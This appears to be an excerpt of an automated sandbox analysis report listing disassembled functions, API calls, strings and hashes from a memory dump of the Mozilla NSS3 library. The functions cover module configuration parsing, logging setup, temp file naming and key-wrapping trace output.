NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C7D5F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C7D5F5B
free.MOZGLUE(00000000), ref: 6C7D5F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C7D5FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C7D5FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7D5FC4
free.MOZGLUE(00000000), ref: 6C7D5FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C7D5FE9
free.MOZGLUE(00000000), ref: 6C7D5FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C7D600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D6027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C7D605A
PR_smprintf.NSS3(6C8AAAF9,00000000), ref: 6C7D606A
free.MOZGLUE(00000000), ref: 6C7D607C
free.MOZGLUE(00000000), ref: 6C7D609A
free.MOZGLUE(00000000), ref: 6C7D60B2
free.MOZGLUE(?), ref: 6C7D60CE

Strings

pkcs11.txt, xrefs: 6C7D5F47, 6C7D5F7C, 6C7D603A, 6C7D6053
secmod=, xrefs: 6C7D5FB1
forceSecmodChoice, xrefs: 6C7D5F55
configDir=, xrefs: 6C7D5F9D
secmod.db, xrefs: 6C7D5EA0
noModDB, xrefs: 6C7D5EEA
flags, xrefs: 6C7D5E3A, 6C7D5EC6, 6C7D5F30
readOnly, xrefs: 6C7D5E56
%s/%s, xrefs: 6C7D6055

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 0291f8a8c6ec71290d5aadb26fe2bdfb2645831801f381abab3ddf4a326df816
Instruction ID: 6fff512aaf8a5e7995dfb3fd4fea596695f71d7ae30c38b61e2a5799b43b13f2
Opcode Fuzzy Hash: 0291f8a8c6ec71290d5aadb26fe2bdfb2645831801f381abab3ddf4a326df816
Instruction Fuzzy Hash: C091F7F09042415BEF509F65EE85BAA3BA8DF0524CF0A0470EC59DBB42E735EA15C7B2

Function 6C761D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C761DA3

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C761DB2

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C761DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C761E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C761EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C761ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C761EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C761F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C761F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C761F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C761F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C761F83
PR_SetLogFile.NSS3(00000000), ref: 6C761FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C761FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C761FCB
free.MOZGLUE(00000000), ref: 6C761FD2

Strings

timestamp, xrefs: 6C761EC4
NSPR_LOG_MODULES, xrefs: 6C761DAD
Unable to create nspr log file '%s', xrefs: 6C761FB3
, %n, xrefs: 6C761E6B
append, xrefs: 6C761EE6
bufsize, xrefs: 6C761E9B
NSPR_LOG_FILE, xrefs: 6C761F69
all, xrefs: 6C761F0E
sync, xrefs: 6C761E46
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C761E27

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: ddfb028fc6e31b985e8c1ab81767d62ee7c504d972c8e19f656c773cbe21710c
Instruction ID: 47506864d04691ca3250fbe8d89cad6cf536e590d8d28ba9ee67ce008e1c7b92
Opcode Fuzzy Hash: ddfb028fc6e31b985e8c1ab81767d62ee7c504d972c8e19f656c773cbe21710c
Instruction Fuzzy Hash: F5516FB1E012099BDF10DBE6DE48A9E77B8AF01309F180938EC15EBE01E771D518CB91

Function 6C846E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C70BE66), ref: 6C846E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C70BE66), ref: 6C846E98
sqlite3_snprintf.NSS3(?,00000000,6C8AAAF9,?,?,?,?,?,?,6C70BE66), ref: 6C846EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C70BE66), ref: 6C846ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C70BE66), ref: 6C846EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C70BE66), ref: 6C846FA6
sqlite3_snprintf.NSS3(?,00000000,6C8AAAF9,00000000,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C70BE66), ref: 6C847014
sqlite3_free.NSS3(00000000,?,?,?,?,6C70BE66), ref: 6C84701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C70BE66), ref: 6C847030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C70BE66), ref: 6C84705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C70BE66), ref: 6C847079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C70BE66), ref: 6C847097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C8470A0

Strings

winGetTempname4, xrefs: 6C847046
winGetTempname5, xrefs: 6C847071
mz_etilqs_, xrefs: 6C846F18
winGetTempname2, xrefs: 6C8470C4
winGetTempname1, xrefs: 6C84708F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 8f4499dce5b591d702f2e72f99bd5fedf84d1de7e0a8394cd764b751ccbec3cd
Instruction ID: 18c66c3d647a5eeef0539f475df49e1801979c91936bd5bece78f5c7724e553b
Opcode Fuzzy Hash: 8f4499dce5b591d702f2e72f99bd5fedf84d1de7e0a8394cd764b751ccbec3cd
Instruction Fuzzy Hash: D8517BB1A0111567E33097349E55FBB36568F9230CF148D38E81696FC2FB25A50FC2D6

Function 6C7D4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000,00000000,00000001), ref: 6C7D5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7D5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C7D5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7D50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2), ref: 6C7D50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7D50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5153
free.MOZGLUE(?), ref: 6C7D516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C7D517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D5195

Strings

parameters=, xrefs: 6C7D506B
library=, xrefs: 6C7D5043
name=, xrefs: 6C7D5057
nss=, xrefs: 6C7D5083
config=, xrefs: 6C7D509B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 39b4f7ddbb139041d975b7a65f757b0ea5a595f64629a3c7a8b1f2fa11860544
Instruction ID: e7c99b9cd1d05e2838c6d38c3227aefae915a288abc9750f81d43dddb011b1a0
Opcode Fuzzy Hash: 39b4f7ddbb139041d975b7a65f757b0ea5a595f64629a3c7a8b1f2fa11860544
Instruction Fuzzy Hash: BD51D7F1A012166BEB50DF24EE45AAA37B8DF06248F190430EC59E7741EB26F915C7F2

Function 6C7A8E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C7A8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8EB3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C7A8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8F29
PR_LogPrint.NSS3(?,00000000), ref: 6C7A8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7A8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8F80
PR_LogPrint.NSS3(?,00000000), ref: 6C7A8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C7A8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C7A8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C7A9047

Strings

pMechanism = 0x%p, xrefs: 6C7A8EE0
pWrappedKey = 0x%p, xrefs: 6C7A8FAD
hSession = 0x%x, xrefs: 6C7A8E8E, 6C7A8E9E
hWrappingKey = 0x%x, xrefs: 6C7A8F01, 6C7A8F11
C_WrapKey, xrefs: 6C7A8E71
*pulWrappedKeyLen = 0x%x, xrefs: 6C7A9042
hKey = 0x%x, xrefs: 6C7A8F5B, 6C7A8F6B
(CK_INVALID_HANDLE), xrefs: 6C7A8EAC, 6C7A8F1F, 6C7A8F79
pulWrappedKeyLen = 0x%p, xrefs: 6C7A8FC8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: 22d289d204981b75711549e9f796da997a7af330e21ec90051e834ce6c293bac
Instruction ID: 5f8a812f1d23341897fc85f06023619daf93d30b87656baf1393657095106de6
Opcode Fuzzy Hash: 22d289d204981b75711549e9f796da997a7af330e21ec90051e834ce6c293bac
Instruction Fuzzy Hash: 5351F431502155EFDB209F988F4CF9A7B76AB4631CF048476F90867A12D734BC1ACB91

Function 6C7D4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C5B
PR_smprintf.NSS3(6C8AAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C7D4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C7D4DA2
free.MOZGLUE(?), ref: 6C7D4DB9
free.MOZGLUE(00000000), ref: 6C7D4DCF

Strings

timeout, xrefs: 6C7D4C91
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C7D4D9D
slotFlags, xrefs: 6C7D4D34
rootFlags, xrefs: 6C7D4D47
%s,%s, xrefs: 6C7D4C4B
rust, xrefs: 6C7D4D22
ootT, xrefs: 6C7D4D1A
any, xrefs: 6C7D4C96
0x%08lx=[%s %s], xrefs: 6C7D4D80
every, xrefs: 6C7D4CA1

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: f177ec899e00ec3cd0ebfb13c9a4d36720d19c5b54a216b12720f9ba52708a46
Instruction ID: 53e1dde75d0529bd00ca2d3e86901273953251d1d846f56983d7e746eb38187d
Opcode Fuzzy Hash: f177ec899e00ec3cd0ebfb13c9a4d36720d19c5b54a216b12720f9ba52708a46
Instruction Fuzzy Hash: 3A41ADF1900141ABDB215F54DE49ABA3665AF8230CF5A4134E80A1BB02E731F925D7D3

Function 6C7B6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C7B6943
Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C7B6957
Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C7B6972
Part of subcall function 6C7B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C7B6983
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7B69AA
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7B69BE
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7B69D2
Part of subcall function 6C7B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7B69DF
Part of subcall function 6C7B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C7B6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C7B6D8C
free.MOZGLUE(00000000), ref: 6C7B6DC5
free.MOZGLUE(?), ref: 6C7B6DD6
free.MOZGLUE(?), ref: 6C7B6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C7B6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6E72
free.MOZGLUE(?), ref: 6C7B6EA7
free.MOZGLUE(?), ref: 6C7B6EC4
free.MOZGLUE(?), ref: 6C7B6ED5
free.MOZGLUE(00000000), ref: 6C7B6EE3
free.MOZGLUE(?), ref: 6C7B6EF4
free.MOZGLUE(?), ref: 6C7B6F08
free.MOZGLUE(00000000), ref: 6C7B6F35
free.MOZGLUE(?), ref: 6C7B6F44
free.MOZGLUE(?), ref: 6C7B6F5B
free.MOZGLUE(00000000), ref: 6C7B6F65

Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C7B781D,00000000,6C7ABE2C,?,6C7B6B1D,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C40
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?), ref: 6C7B6C58
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C6F
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C7B6C84
Part of subcall function 6C7B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C7B6C96
Part of subcall function 6C7B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C7B6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C7B6FF4

Strings

+`|l, xrefs: 6C7B6D0D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`|l
API String ID: 1304971872-3643680650
Opcode ID: 682faba1504c722236518796e5e00aea7659d53f37002e8fa7edcaf600f460ca
Instruction ID: cf43ed0f09616af22ec8ad4a7062b25fe27b940a566252fb9b7644d2369c2542
Opcode Fuzzy Hash: 682faba1504c722236518796e5e00aea7659d53f37002e8fa7edcaf600f460ca
Instruction Fuzzy Hash: A1B14CB1E012099FDF14DFA9DA45B9EBBB8BF05248F140034EA15F7A41E731EA15CBA1

Function 6C77DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C77DDDE

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C77DDF5

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C77DE34
PR_Now.NSS3 ref: 6C77DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C77DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C77DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C77DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C77DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6C77DEF0
PR_smprintf.NSS3(6C8AAAF9,(NULL) (Validity Unknown)), ref: 6C77DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C77DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C77DF22
